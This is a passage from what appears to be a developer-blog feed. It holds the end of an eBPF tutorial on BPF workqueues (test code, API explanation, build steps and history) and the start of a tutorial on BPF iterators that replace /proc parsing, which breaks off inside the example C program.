        &lt;span class="n"&gt;unlink&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"/tmp/wq_test_file"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Give workqueue time to execute */&lt;/span&gt;
    &lt;span class="n"&gt;sleep&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Check results */&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Results:&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"  main_executed = %u (expected: 1)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;main_executed&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"  wq_executed = %u (expected: 1)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;wq_executed&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;main_executed&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;wq_executed&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;✓ Test PASSED!&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;✗ Test FAILED!&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nl"&gt;cleanup:&lt;/span&gt;
    &lt;span class="n"&gt;wq_simple_bpf__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the User-Space Code
&lt;/h3&gt;

&lt;p&gt;The userspace program orchestrates the test and verifies results. We use the libbpf skeleton API, which embeds the already compiled BPF bytecode in a generated C header, making loading trivial. Nothing is compiled at run time: the &lt;code&gt;wq_simple_bpf__open_and_load()&lt;/code&gt; call opens the embedded object, creates all maps, and loads the BPF program into the kernel (where the verifier checks it) in one operation.&lt;/p&gt;

&lt;p&gt;After loading, &lt;code&gt;wq_simple_bpf__attach()&lt;/code&gt; attaches the fentry program to &lt;code&gt;do_unlinkat&lt;/code&gt;. From this point, any unlink syscall will trigger our BPF program. We deliberately trigger this by creating and immediately deleting a temporary file. The &lt;code&gt;open()&lt;/code&gt; creates &lt;code&gt;/tmp/wq_test_file&lt;/code&gt;, we close the fd, then &lt;code&gt;unlink()&lt;/code&gt; deletes it. This deletion enters the kernel's &lt;code&gt;do_unlinkat&lt;/code&gt; function, triggering our fentry probe.&lt;/p&gt;

&lt;p&gt;Here's the critical timing aspect: workqueue execution is asynchronous. Our main BPF program schedules the work and returns immediately. The kernel queues the callback for later execution by a kernel worker thread. This is why we &lt;code&gt;sleep(1)&lt;/code&gt; - giving the workqueue time to execute before we check results. In production code, you'd use more sophisticated synchronization, but for a simple test, sleep is sufficient.&lt;/p&gt;

&lt;p&gt;After the sleep, we read global variables from the BPF program's &lt;code&gt;.bss&lt;/code&gt; section. The skeleton provides convenient access through &lt;code&gt;skel-&amp;gt;bss-&amp;gt;main_executed&lt;/code&gt; and &lt;code&gt;skel-&amp;gt;bss-&amp;gt;wq_executed&lt;/code&gt;. If both are 1, we know the synchronous path (fentry) and async path (workqueue callback) both executed successfully.&lt;/p&gt;

&lt;h2&gt;
  
  
  Understanding Workqueue APIs
&lt;/h2&gt;

&lt;p&gt;The workqueue API consists of three essential functions that manage the lifecycle. &lt;strong&gt;&lt;code&gt;bpf_wq_init(wq, map, flags)&lt;/code&gt;&lt;/strong&gt; initializes a workqueue handle, establishing the relationship between the workqueue and its containing map. The map parameter is crucial - it tells the verifier which map contains the value with the embedded &lt;code&gt;bpf_wq&lt;/code&gt; structure. The verifier uses this to ensure memory safety across async execution. Flags should be 0 in current kernels.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;bpf_wq_set_callback(wq, callback_fn, flags)&lt;/code&gt;&lt;/strong&gt; registers the function to execute asynchronously. The callback must have the signature &lt;code&gt;int callback(void *map, int *key, void *value)&lt;/code&gt;. The verifier checks this signature at load time and will reject programs with mismatched signatures. This type safety prevents common async programming errors. Flags should be 0.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;bpf_wq_start(wq, flags)&lt;/code&gt;&lt;/strong&gt; schedules the workqueue to run. This returns immediately - your BPF program continues executing synchronously. The kernel queues the callback for execution by a worker thread in process context at some point in the future. The callback might run microseconds or milliseconds later depending on system load. Flags should be 0.&lt;/p&gt;

&lt;p&gt;The callback signature deserves attention. Unlike &lt;code&gt;bpf_timer&lt;/code&gt; callbacks which receive &lt;code&gt;(void *map, __u32 *key, void *value)&lt;/code&gt;, workqueue callbacks receive &lt;code&gt;(void *map, int *key, void *value)&lt;/code&gt;. Note the key type difference - &lt;code&gt;int *&lt;/code&gt; vs &lt;code&gt;__u32 *&lt;/code&gt;. This reflects the evolution of the API and must be matched exactly or the verifier rejects your program. The callback runs in process context, so it can safely perform operations that would crash in softirq context.&lt;/p&gt;

&lt;h2&gt;
  
  
  When to Use Workqueues vs Timers
&lt;/h2&gt;

&lt;p&gt;Choose &lt;strong&gt;bpf_timer&lt;/strong&gt; when you need microsecond-precision timing, operations are fast and non-blocking, you're updating counters or simple state, or implementing periodic fast-path operations like statistics collection or packet pacing. Timers excel at time-critical tasks that must execute with minimal latency.&lt;/p&gt;

&lt;p&gt;Choose &lt;strong&gt;bpf_wq&lt;/strong&gt; when you need to sleep or wait, call sleepable kernel functions that may allocate memory (for example, kfuncs that use &lt;code&gt;kzalloc()&lt;/code&gt; internally), perform device or network I/O, or defer cleanup operations that can happen later. Workqueues are perfect for the "fast path + slow path" pattern where critical operations happen immediately and expensive processing runs asynchronously. Examples include HID device I/O (keyboard macro injection with delays), async map cleanup (preventing memory leaks), security policy updates (querying external databases), and background processing (compression, encryption, aggregation).&lt;/p&gt;

&lt;p&gt;The fundamental trade-off is latency vs capability. Timers have lower latency but restricted capabilities. Workqueues have higher latency but full process context capabilities including sleeping and blocking I/O.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Navigate to the bpf_wq directory and build:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;bpf-developer-tutorial/src/features/bpf_wq
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Makefile compiles the BPF program with the experimental workqueue features enabled and generates a skeleton header.&lt;/p&gt;

&lt;p&gt;Run the simple workqueue test:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./wq_simple
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Expected output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;BPF workqueue program attached. Triggering unlink syscall...

Results:
  main_executed = 1 (expected: 1)
  wq_executed = 1 (expected: 1)

✓ Test PASSED!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The test verifies that both the synchronous fentry probe and the asynchronous workqueue callback executed successfully. If the workqueue callback didn't run, &lt;code&gt;wq_executed&lt;/code&gt; would be 0 and the test would fail.&lt;/p&gt;
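
&lt;p&gt;If the program fails to load or &lt;code&gt;wq_executed&lt;/code&gt; stays at 0, one thing worth ruling out first is the kernel version, since workqueue support arrived in Linux 6.10. The snippet below is a minimal sketch of such a check and is not part of the tutorial repository: &lt;code&gt;version_ge&lt;/code&gt; is a hypothetical helper name, and the comparison assumes a &lt;code&gt;sort&lt;/code&gt; that supports &lt;code&gt;-V&lt;/code&gt; (as GNU coreutils does). Distribution kernels sometimes backport features, so treat the result as a hint rather than a guarantee.&lt;/p&gt;

```shell
# Hypothetical helper: succeeds when version $1 is at least version $2.
# Assumes `sort -V` (version sort) is available, as in GNU coreutils.
version_ge() {
    [ "$(printf '%s\n' "$2" "$1" | sort -V | head -n1)" = "$2" ]
}

# Keep only the leading digits and dots of the running kernel release,
# dropping suffixes such as "-generic" or "-rc1".
release="$(uname -r)"
kernel="${release%%[!0-9.]*}"

if version_ge "$kernel" 6.10; then
    echo "kernel $release: new enough for bpf_wq"
else
    echo "kernel $release: older than 6.10, bpf_wq is not expected to be available"
fi
```

&lt;p&gt;The suffix stripping turns a release string such as &lt;code&gt;6.10.0-rc1&lt;/code&gt; into &lt;code&gt;6.10.0&lt;/code&gt; before the comparison, so only the numeric part is compared.&lt;/p&gt;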

&lt;h2&gt;
  
  
  Historical Timeline and Context
&lt;/h2&gt;

&lt;p&gt;Understanding how workqueues came to exist helps appreciate their design. In 2022, Benjamin Tissoires started work on HID-BPF, aiming to let users fix broken HID devices without kernel drivers. By 2023, he realized &lt;code&gt;bpf_timer&lt;/code&gt; limitations made HID device I/O impossible - you can't wait for hardware responses in softirq context. In early 2024, he proposed &lt;code&gt;bpf_wq&lt;/code&gt; as "bpf_timer in process context," collaborating with the BPF community on the design. The kernel merged workqueues in April 2024 as part of Linux v6.10. Since then, they've been used for HID quirks, rate limiting, async cleanup, and other sleepable operations.&lt;/p&gt;

&lt;p&gt;The key quote from Benjamin's patches captures the motivation perfectly: "I need something similar to bpf_timers, but not in soft IRQ context... the bpf_timer functionality would prevent me to kzalloc and wait for the device."&lt;/p&gt;

&lt;p&gt;This real-world need drove the design. Workqueues exist because device handling and resource management require sleepable, blocking operations that timers fundamentally cannot provide.&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary and Next Steps
&lt;/h2&gt;

&lt;p&gt;BPF workqueues solve a fundamental limitation of eBPF by enabling sleepable, blocking operations in process context. Created specifically to support HID device handling where timing delays and device I/O are essential, workqueues unlock powerful new capabilities for eBPF programs. They enable the "fast path + slow path" pattern where performance-critical operations execute immediately while expensive cleanup and I/O happen asynchronously without blocking.&lt;/p&gt;

&lt;p&gt;Our simple example demonstrates the core workqueue lifecycle: embedding a &lt;code&gt;bpf_wq&lt;/code&gt; in a map value, initializing and configuring it, scheduling async execution, and verifying that the callback actually ran. This same pattern scales to production use cases like network rate limiting with async cleanup, security monitoring with external service queries, and device handling with I/O operations.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you'd like to dive deeper into eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Original Kernel Patches:&lt;/strong&gt; Benjamin Tissoires' HID-BPF and bpf_wq patches (2023-2024)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Linux Kernel Source:&lt;/strong&gt; &lt;code&gt;kernel/bpf/helpers.c&lt;/code&gt; - workqueue implementation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tutorial Repository:&lt;/strong&gt; &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_wq" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_wq&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Example adapted from Linux kernel BPF selftests with educational enhancements. Requires Linux kernel 6.10+ for workqueue support. Complete source code available in the tutorial repository.&lt;/p&gt;

</description>
      <category>ebpf</category>
      <category>workqueue</category>
      <category>kernel</category>
    </item>
    <item>
      <title>eBPF Tutorial: BPF Iterators for Kernel Data Export</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 13 Jan 2026 07:18:49 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-bpf-iterators-for-kernel-data-export-137f</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-bpf-iterators-for-kernel-data-export-137f</guid>
      <description>&lt;p&gt;Ever tried monitoring hundreds of processes and ended up parsing thousands of &lt;code&gt;/proc&lt;/code&gt; files just to find the few you care about? Or needed custom formatted kernel data but didn't want to modify the kernel itself? Traditional &lt;code&gt;/proc&lt;/code&gt; filesystem access is slow, inflexible, and forces you to process tons of data in userspace even when you only need a small filtered subset.&lt;/p&gt;

&lt;p&gt;This is what &lt;strong&gt;BPF Iterators&lt;/strong&gt; solve. Introduced in Linux kernel 5.8, iterators let you traverse kernel data structures directly from BPF programs, apply filters in-kernel, and output exactly the data you need in any format you want. In this tutorial, we'll build a dual-mode iterator that shows kernel stack traces and open file descriptors for processes, with in-kernel filtering by process name - dramatically faster than parsing &lt;code&gt;/proc&lt;/code&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_iters" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_iters&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction to BPF Iterators: The /proc Replacement
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: /proc is Slow and Rigid
&lt;/h3&gt;

&lt;p&gt;Traditional Linux monitoring revolves around the &lt;code&gt;/proc&lt;/code&gt; filesystem. Need to see what processes are doing? Read &lt;code&gt;/proc/*/stack&lt;/code&gt;. Want open files? Parse &lt;code&gt;/proc/*/fd/*&lt;/code&gt;. This works, but it's painfully inefficient when you're monitoring systems at scale or need specific filtered views of kernel data.&lt;/p&gt;

&lt;p&gt;The performance problem is systemic. Every &lt;code&gt;/proc&lt;/code&gt; access requires syscalls, kernel mode transitions, text formatting, and a data copy to userspace, and then you parse that text back into structures. If you want stack traces for all "bash" processes among 1000 total processes, you still read all 1000 &lt;code&gt;/proc/*/stack&lt;/code&gt; files and filter in userspace. That's at least 1000 syscalls (in practice several per file, since each one is opened, read, and closed), 1000 text parsing operations, and megabytes of data transferred just to find a handful of matches.&lt;/p&gt;

&lt;p&gt;Format inflexibility compounds the problem. The kernel chooses what data to show and how to format it. Want stack traces with custom annotations? Too bad, you get the kernel's fixed format. Need to aggregate data across processes? Parse everything in userspace. The &lt;code&gt;/proc&lt;/code&gt; interface is designed for human consumption, not programmatic filtering and analysis.&lt;/p&gt;

&lt;p&gt;Here's what traditional monitoring looks like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Find stack traces for all bash processes&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;pid &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;pgrep bash&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"=== PID &lt;/span&gt;&lt;span class="nv"&gt;$pid&lt;/span&gt;&lt;span class="s2"&gt; ==="&lt;/span&gt;
  &lt;span class="nb"&gt;cat&lt;/span&gt; /proc/&lt;span class="nv"&gt;$pid&lt;/span&gt;/stack
&lt;span class="k"&gt;done&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



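&lt;p&gt;This spawns &lt;code&gt;pgrep&lt;/code&gt;, which itself scans the &lt;code&gt;/proc&lt;/code&gt; entry of every process to match names, then runs a separate &lt;code&gt;cat&lt;/code&gt; process for each matching PID to read its stack file, and leaves all formatting and filtering to userspace. Simple to write, horrible for performance.&lt;/p&gt;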

&lt;h3&gt;
  
  
  The Solution: Programmable In-Kernel Iteration
&lt;/h3&gt;

&lt;p&gt;BPF iterators flip the model. Instead of pulling all data to userspace for processing, you push your processing logic into the kernel where the data lives. An iterator is a BPF program attached to a kernel data structure traversal that gets called for each element. The kernel walks tasks, files, or sockets, invokes your BPF program with each element's context, and your code decides what to output and how to format it.&lt;/p&gt;

&lt;p&gt;The architecture is elegant. You write a BPF program marked &lt;code&gt;SEC("iter/task")&lt;/code&gt; or &lt;code&gt;SEC("iter/task_file")&lt;/code&gt; that receives each task or file during iteration. Inside this program, you have direct access to kernel struct fields, can filter based on any criteria using normal C logic, and use &lt;code&gt;BPF_SEQ_PRINTF()&lt;/code&gt; to format output exactly as needed. The kernel handles the iteration mechanics while your code focuses purely on filtering and formatting.&lt;/p&gt;

&lt;p&gt;When userspace reads from the iterator file descriptor, the magic happens entirely in the kernel. The kernel walks the task list, calls your BPF program for each task passing the task_struct pointer. Your program checks if the task name matches your filter - if not, it returns 0 immediately with no output. If it matches, your program extracts the stack trace and formats it to a seq_file. All this happens in kernel context before any data crosses to userspace.&lt;/p&gt;

&lt;p&gt;The benefits are transformative. &lt;strong&gt;In-kernel filtering&lt;/strong&gt; means only relevant data crosses the kernel boundary, eliminating wasted work. &lt;strong&gt;Custom formats&lt;/strong&gt; let you output binary, JSON, CSV, whatever your tools need. &lt;strong&gt;Single read operation&lt;/strong&gt; replaces thousands of individual &lt;code&gt;/proc&lt;/code&gt; file accesses. &lt;strong&gt;Zero parsing&lt;/strong&gt; because you formatted the data correctly in the kernel. &lt;strong&gt;Composability&lt;/strong&gt; works with standard Unix tools since iterator output comes through a normal file descriptor.&lt;/p&gt;

&lt;h3&gt;
  
  
  Iterator Types and Capabilities
&lt;/h3&gt;

&lt;p&gt;The kernel provides iterators for many subsystems. &lt;strong&gt;Task iterators&lt;/strong&gt; (&lt;code&gt;iter/task&lt;/code&gt;) walk all tasks giving you access to process state, credentials, resource usage, and parent-child relationships. &lt;strong&gt;File iterators&lt;/strong&gt; (&lt;code&gt;iter/task_file&lt;/code&gt;) traverse open file descriptors showing files, sockets, pipes, and other fd types. &lt;strong&gt;Network iterators&lt;/strong&gt; (&lt;code&gt;iter/tcp&lt;/code&gt;, &lt;code&gt;iter/udp&lt;/code&gt;) walk active network connections with full socket state. &lt;strong&gt;BPF object iterators&lt;/strong&gt; (&lt;code&gt;iter/bpf_map&lt;/code&gt;, &lt;code&gt;iter/bpf_prog&lt;/code&gt;) enumerate loaded BPF programs and maps for introspection.&lt;/p&gt;

&lt;p&gt;Our tutorial focuses on task and task_file iterators because they solve common monitoring needs and demonstrate core concepts applicable to all iterator types.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementation: Dual-Mode Task Iterator
&lt;/h2&gt;

&lt;p&gt;Let's build a complete example demonstrating two iterator types in one tool. We'll create a program that can show either kernel stack traces or open file descriptors for processes, with optional filtering by process name.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete BPF Program: task_stack.bpf.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cm"&gt;/* Kernel task stack and file descriptor iterator */&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;vmlinux.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;_license&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cp"&gt;#define MAX_STACK_TRACE_DEPTH   64
&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;entries&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;MAX_STACK_TRACE_DEPTH&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{};&lt;/span&gt;
&lt;span class="cp"&gt;#define SIZE_OF_ULONG (sizeof(unsigned long))
&lt;/span&gt;
&lt;span class="cm"&gt;/* Filter: only show stacks for tasks with this name (empty = show all) */&lt;/span&gt;
&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;target_comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;""&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;stacks_shown&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;files_shown&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cm"&gt;/* Task stack iterator */&lt;/span&gt;
&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"iter/task"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;dump_task_stack&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_iter__task&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;seq_file&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;meta&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;retlen&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;match&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="cm"&gt;/* End of iteration - print summary */&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stacks_shown&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;BPF_SEQ_PRINTF&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;=== Summary: %u task stacks shown ===&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                       &lt;span class="n"&gt;stacks_shown&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Filter by task name if specified */&lt;/span&gt;
